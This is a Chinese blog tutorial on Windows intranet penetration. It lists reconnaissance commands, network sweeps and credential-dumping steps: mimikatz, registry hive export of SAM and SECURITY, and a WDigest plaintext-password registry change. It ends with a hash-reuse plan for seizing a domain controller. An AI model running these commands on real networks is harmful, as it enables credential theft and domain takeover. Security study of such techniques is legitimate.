<!DOCTYPE html>


  <html class="light page-post">


<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <title>内网渗透基础篇 | Hexo</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="web安全，app安全，咸鱼">
  

  <meta name="description" content="内网渗透信息收集自身信息收集12345678910111213141516171819202122232425262728293031323334353637ipconfig /all                ------ 查询本机IP段，所在域等net user                     ------ 本机用户列表net localgroup administrators">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透基础篇">
<meta property="og:url" content="http://yoursite.com/2019/10/28/内网渗透基础篇/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="内网渗透信息收集自身信息收集12345678910111213141516171819202122232425262728293031323334353637ipconfig /all                ------ 查询本机IP段，所在域等net user                     ------ 本机用户列表net localgroup administrators">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2019-11-06T08:18:49.614Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内网渗透基础篇">
<meta name="twitter:description" content="内网渗透信息收集自身信息收集12345678910111213141516171819202122232425262728293031323334353637ipconfig /all                ------ 查询本机IP段，所在域等net user                     ------ 本机用户列表net localgroup administrators">

  

  
    <link rel="icon" href="/favicon.ico">
  

  <link href="/css/styles.css?v=c114cbeddx" rel="stylesheet">


  
    <link rel="stylesheet" href="/css/personal-style.css">
  

  
<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-38189205-1', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->


  
  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?57e94d016e201fba3603a8a2b0263af0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>


  
  <script type="text/javascript">
	(function(){
	    var bp = document.createElement('script');
	    var curProtocol = window.location.protocol.split(':')[0];
	    if (curProtocol === 'https') {
	        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
	    }
	    else {
	        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
	    }
	    var s = document.getElementsByTagName("script")[0];
	    s.parentNode.insertBefore(bp, s);
	})();
  </script>



  
    <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css">
  

</head>
</html>
<body>


  
    <span id="toolbox-mobile" class="toolbox-mobile">盒子</span>
  

  <div class="post-header CENTER">
   
  <div class="toolbox">
    <a class="toolbox-entry" href="/">
      <span class="toolbox-entry-text">盒子</span>
      <i class="icon-angle-down"></i>
      <i class="icon-home"></i>
    </a>
    <ul class="list-toolbox">
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/archives/"
            rel="noopener noreferrer"
            target="_self"
            >
            博客
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/category/"
            rel="noopener noreferrer"
            target="_self"
            >
            分类
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/tags/"
            rel="noopener noreferrer"
            target="_self"
            >
            标签
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/link/"
            rel="noopener noreferrer"
            target="_self"
            >
            友链
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/atom.xml"
            rel="noopener noreferrer"
            target="_blank"
            >
            RSS
          </a>
        </li>
      
        <li class="item-toolbox">
          <a
            class="CIRCLE"
            href="/search/"
            rel="noopener noreferrer"
            target="_self"
            >
            搜索
          </a>
        </li>
      
    </ul>
  </div>


</div>


  <div id="toc" class="toc-article">
    <strong class="toc-title">Posts List</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#内网渗透"><span class="toc-text">内网渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#自身信息收集"><span class="toc-text">自身信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#内网环境探测"><span class="toc-text">内网环境探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#抓取主机密码"><span class="toc-text">抓取主机密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#攻击思路及漏洞"><span class="toc-text">攻击思路及漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#window2008GPP漏洞"><span class="toc-text">window2008GPP漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#相同密码登陆（hash碰撞）"><span class="toc-text">相同密码登陆（hash碰撞）</span></a></li></ol></li></ol></li></ol>
  </div>



<div class="content content-post CENTER">
   <article id="post-内网渗透基础篇" class="article article-type-post" itemprop="blogPost">
  <header class="article-header">
    <h1 class="post-title">内网渗透基础篇</h1>

    <div class="article-meta">
      <span>
        <i class="icon-calendar"></i>
        <span>2019.10.28</span>
      </span>

      
        <span class="article-author">
          <i class="icon-user"></i>
          <span>John Doe</span>
        </span>
      

      


      

      
      <i class="fa fa-eye"></i> 
        <span id="busuanzi_container_page_pv">
           &nbsp热度 <span id="busuanzi_value_page_pv">
           <i class="fa fa-spinner fa-spin"></i></span>℃
        </span>
      
      
    </div>
  </header>

  <div class="article-content">
    
      <h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="自身信息收集"><a href="#自身信息收集" class="headerlink" title="自身信息收集"></a>自身信息收集</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all                ------ 查询本机IP段，所在域等</span><br><span class="line">net user                     ------ 本机用户列表</span><br><span class="line">net localgroup administrators            ------ 本机管理员[通常含有域用户]</span><br><span class="line">net user /domain                         ------ 查询域用户</span><br><span class="line">net ``group` `/domain                        ------ 查询域里面的工作组</span><br><span class="line">net ``group` `&quot;domain admins&quot;` `/domain        ------ 查询域管理员用户组</span><br><span class="line">net localgroup administrators /domain    ------ 登录本机的域管理员</span><br><span class="line">net localgroup administrators workgroup\user001 /add   ------域用户添加到本机</span><br><span class="line">net ``group` `&quot;domain controllers&quot;` `/domain        ------ 查看域控制器(如果有多台)</span><br><span class="line">net time /domain                   ------ 判断主域，主域服务器都做时间服务器</span><br><span class="line">net config workstation             ------ 当前登录域</span><br><span class="line">net session                        ------ 查看当前会话</span><br><span class="line">net use \\ip\ipc$ pawword /user:username      ------ 建立IPC会话[空连接-***]</span><br><span class="line">net share                          ------  查看SMB指向的路径[即共享]</span><br><span class="line">net view                           ------ 查询同一域内机器列表</span><br><span class="line">net view \\ip                      ------ 查询某IP共享</span><br><span class="line">net view /domain                   ------ 查询域列表</span><br><span class="line">net view /domain:domainname        ------ 查看workgroup域中计算机列表</span><br><span class="line">net start                          ------ 查看当前运行的服务</span><br><span class="line">net accounts                       ------  查看本地密码策略</span><br><span class="line">net accounts /domain               ------  查看域密码策略</span><br><span class="line">nbtstat –A ip                      ------netbios 查询</span><br><span class="line">netstat –an/ano/anb                ------ 网络连接查询</span><br><span class="line">route print                        ------ 路由表tasklist /V                        ----- 查看进程[显示对应用户]</span><br><span class="line">tasklist /S ip /U domain\username /P /V             ----- 查看远程计算机进程列表</span><br><span class="line">qprocess *                         ----- 类似tasklist</span><br><span class="line">qprocess /SERVER:IP                ----- 远程查看计算机进程列表</span><br><span class="line">nslookup –qt-MX Yahoo.com          ----- 查看邮件服务器</span><br><span class="line">whoami /all                        ----- 查询当前用户权限等</span><br><span class="line">set`                                `----- 查看系统环境变量</span><br><span class="line">systeminfo                         ----- 查看系统信息</span><br><span class="line">qwinsta                            ----- 查看登录情况</span><br><span class="line">qwinsta /SERVER:IP                 ----- 查看远程登录情况</span><br><span class="line">fsutil fsinfo drives               ----- 查看所有盘符</span><br><span class="line">gpupdate /force                    ----- 更新域策略</span><br><span class="line">cmdkey /l                          ----- 看是否保存了登陆凭证。（攻击者会先查看管理员是否保留了登陆凭证，方便后续的凭证抓取。）  </span><br><span class="line">echo %logonserver%                 ----- 查看登陆域</span><br></pre></td></tr></table></figure>

<h3 id="内网环境探测"><a href="#内网环境探测" class="headerlink" title="内网环境探测"></a>内网环境探测</h3><p>可能防火墙禁止icmp可以通过arp等协议扫描，通过各种手段了解主机所在内网环境情况。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">windows:内网IP探测</span><br><span class="line">icmp:powershell.exe -exec bypass -Command &quot;Import-Module C:\Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -Port 21,22,23,25,53,80,81,82,83,84,85,86,87,88,89,110,111,143,389,443,445,873,1025,1433,1521,2601,3306,3389,3690,5432,5900,7001,8000,8080,8081,8082,8083,8084,8085,8086,8087,8089,9090,10000&quot;</span><br><span class="line">arp:powershell.exe -exec bypass -Command &quot;Import-Module C:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24&quot;  &gt;&gt; result.txt</span><br><span class="line">linux:内网ip探测</span><br><span class="line">for i in 192.168.0.&#123;1..254&#125;; do if ping -c 3 -w 3 $i &amp;&gt;/dev/null; then echo $i is alived; fi; done</span><br></pre></td></tr></table></figure>

<h3 id="抓取主机密码"><a href="#抓取主机密码" class="headerlink" title="抓取主机密码"></a>抓取主机密码</h3><p>主要使用工具抓取主机密码mimikatz，pwdump7，Invoke-PowerDump.ps1</p>
<p>注：都需要管理员权限。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">抓取密码</span><br><span class="line">powershell -ep bypass -f Invoke-PowerDump.ps1</span><br><span class="line"></span><br><span class="line">在windows10/2012r2 之后的系统版本中，默认情况下是禁用了在内存缓存中存储系统用户明文密码，此时使用mimikatz去抓取密码，会显示null。</span><br><span class="line">方法：修改注册表，修改后管理员一旦在输入密码就能在内存中抓取明文</span><br><span class="line">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</span><br><span class="line"></span><br><span class="line">nbtscan</span><br><span class="line">nbtscan.exe -m  192.168.0.1/24</span><br><span class="line"></span><br><span class="line">reg提取主机密码</span><br><span class="line">reg save HKLM\SYSTEM system.hiv</span><br><span class="line">reg save HKLM\SAM sam.hiv</span><br><span class="line">reg save HKLM\SECURITY sercrity.hiv</span><br><span class="line">mimikatz.exe &quot;lsadump::sam /system:system.hiv /sam:sam.hiv /sercrity:sercrity.hiv&quot; exit</span><br></pre></td></tr></table></figure>

<h2 id="攻击思路及漏洞"><a href="#攻击思路及漏洞" class="headerlink" title="攻击思路及漏洞"></a>攻击思路及漏洞</h2><h3 id="window2008GPP漏洞"><a href="#window2008GPP漏洞" class="headerlink" title="window2008GPP漏洞"></a>window2008GPP漏洞</h3><p>为了方便密码更新windows2008使用了组策略，然后生成的密码文件对所有人可读且公钥公开导致可以通过读取组策略文件找到明文密码。补丁KB2962486</p>
<h3 id="相同密码登陆（hash碰撞）"><a href="#相同密码登陆（hash碰撞）" class="headerlink" title="相同密码登陆（hash碰撞）"></a>相同密码登陆（hash碰撞）</h3><p>利用喜欢使用相同密码的特性，不断获取内网中的密码从而找到管理员密码。</p>
<p>1.获得一台域主机权限；<br>2.Dump内存获取用户hash（或明文）；<br>3.通过密码尝试登陆其他主机；<br>4.继续收集hash或明文，并尝试远程登陆；<br>5.知道获得域管理员hash或密码，登陆域控，最终成功控制整个域。</p>

    
  </div>

</article>


   

   
  <div class="box-prev-next clearfix">
    <a class="show pull-left" href="/2019/10/21/区块链之智能合约/">
        <i class="icon icon-angle-left"></i>
    </a>
    <a class="show pull-right" href="/2019/11/06/内网渗透PTH-PTT-PTK/">
        <i class="icon icon-angle-right"></i>
    </a>
  </div>




</div>


  <a id="backTop" class="back-top">
    <i class="icon-angle-up"></i>
  </a>




  <div class="modal" id="modal">
  <span id="cover" class="cover hide"></span>
  <div id="modal-dialog" class="modal-dialog hide-dialog">
    <div class="modal-header">
      <span id="close" class="btn-close">Close</span>
    </div>
    <hr>
    <div class="modal-body">
      <ul class="list-toolbox">
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/archives/"
              rel="noopener noreferrer"
              target="_self"
              >
              博客
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/category/"
              rel="noopener noreferrer"
              target="_self"
              >
              分类
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/tags/"
              rel="noopener noreferrer"
              target="_self"
              >
              标签
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/link/"
              rel="noopener noreferrer"
              target="_self"
              >
              友链
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/atom.xml"
              rel="noopener noreferrer"
              target="_blank"
              >
              RSS
            </a>
          </li>
        
          <li class="item-toolbox">
            <a
              class="CIRCLE"
              href="/search/"
              rel="noopener noreferrer"
              target="_self"
              >
              搜索
            </a>
          </li>
        
      </ul>

    </div>
  </div>
</div>



  
      <div class="fexo-comments comments-post">
    

    

    
    

    

    
    

    

  </div>

  

  <script type="text/javascript">
  function loadScript(url, callback) {
    var script = document.createElement('script')
    script.type = 'text/javascript';

    if (script.readyState) { //IE
      script.onreadystatechange = function() {
        if (script.readyState == 'loaded' ||
          script.readyState == 'complete') {
          script.onreadystatechange = null;
          callback();
        }
      };
    } else { //Others
      script.onload = function() {
        callback();
      };
    }

    script.src = url;
    document.getElementsByTagName('head')[0].appendChild(script);
  }

  window.onload = function() {
    loadScript('/js/bundle.js?235683', function() {
      // load success
    });
  }
</script>

</body>
</html>
